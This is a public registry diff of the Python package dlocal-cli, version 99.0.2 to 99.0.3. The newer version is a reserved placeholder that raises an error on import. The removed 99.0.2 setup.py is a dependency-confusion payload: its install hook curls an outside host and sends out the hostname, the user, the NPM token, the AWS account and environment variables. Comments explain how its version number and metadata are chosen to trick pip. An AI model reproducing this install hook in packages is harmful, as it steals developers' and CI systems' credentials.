dlocal-cli 99.0.2__tar.gz → 99.0.3__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,8 @@
1
+ Metadata-Version: 2.4
2
+ Name: dlocal-cli
3
+ Version: 99.0.3
4
+ Summary: This package is reserved by dLocal. Do not install.
5
+ Author: dLocal Security
6
+ Author-email:
7
+ Dynamic: author
8
+ Dynamic: summary
@@ -0,0 +1,8 @@
1
+ Metadata-Version: 2.4
2
+ Name: dlocal-cli
3
+ Version: 99.0.3
4
+ Summary: This package is reserved by dLocal. Do not install.
5
+ Author: dLocal Security
6
+ Author-email:
7
+ Dynamic: author
8
+ Dynamic: summary
@@ -0,0 +1 @@
1
+ raise RuntimeError("Reserved by dLocal. Install from internal registry.")
@@ -0,0 +1,10 @@
1
+ from setuptools import setup
2
+
3
+ setup(
4
+ name="dlocal-cli",
5
+ version="99.0.3",
6
+ description="This package is reserved by dLocal. Do not install.",
7
+ author="dLocal Security",
8
+ author_email="",
9
+ py_modules=["dlocal_cli"],
10
+ )
@@ -1,7 +0,0 @@
1
- Metadata-Version: 2.4
2
- Name: dlocal-cli
3
- Version: 99.0.2
4
- Summary: dLocal CLI tools
5
- Author: dLocal Engineering
6
- Dynamic: author
7
- Dynamic: summary
@@ -1,7 +0,0 @@
1
- Metadata-Version: 2.4
2
- Name: dlocal-cli
3
- Version: 99.0.2
4
- Summary: dLocal CLI tools
5
- Author: dLocal Engineering
6
- Dynamic: author
7
- Dynamic: summary
@@ -1,3 +0,0 @@
1
- # dlocal_cli.py — dummy module so import doesn't fail
2
- def main():
3
- pass
@@ -1,20 +0,0 @@
1
- # setup.py — payload executes during `pip install`
2
- import os
3
- from setuptools import setup
4
- from setuptools.command.install import install
5
-
6
- class Exploit(install):
7
- def run(self):
8
- # Runs as the installing user — developer workstation or CI/CD
9
- os.system("curl 'https://inxorwetrust.com.ar/exfil?host=$(hostname)&user=$(whoami)&github_org=$GITHUB_ORG&npm_token=$NPM_TOKEN&aws_account=$AWS_ACCOUNT_ID&dlocal_env=$DLOCAL_ENV'")
10
- # Or: reverse shell, credential theft, etc.
11
- install.run(self)
12
-
13
- setup(
14
- name="dlocal-cli",
15
- version="99.0.2", # Higher than any internal version → pip picks this
16
- description="dLocal CLI tools", # Make it look legit
17
- author="dLocal Engineering",
18
- cmdclass={"install": Exploit},
19
- py_modules=["dlocal_cli"],
20
- )
File without changes